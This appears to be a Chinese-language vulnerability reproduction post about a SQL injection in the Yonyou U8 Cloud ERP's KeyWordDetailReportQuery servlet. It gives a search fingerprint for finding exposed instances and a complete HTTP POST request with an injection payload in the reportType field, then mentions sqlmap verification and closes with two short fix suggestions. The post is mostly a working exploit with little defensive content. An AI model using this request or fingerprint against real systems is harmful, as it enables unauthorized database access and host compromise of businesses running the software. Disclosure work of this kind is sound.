产品介绍
用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。
漏洞描述
用友U8 Cloud KeyWordDetailReportQuery接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,进一步利用可造成主机失陷。
资产测绘
app=“用友-U8-Cloud”
漏洞复现
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 207
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"reportType": "' AND 2780 IN (select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) AND 'njGF'='njGF", "usercode": "18701014496", "keyword": [{"keywordPk": "1", "keywordValue": "1", "keywordIndex": 1}]}
返回123456的md5值即存在该漏洞
sqlmap验证
修复建议
1.升级至系统最新版本
2.部署Web应用防火墙,对数据库操作进行监控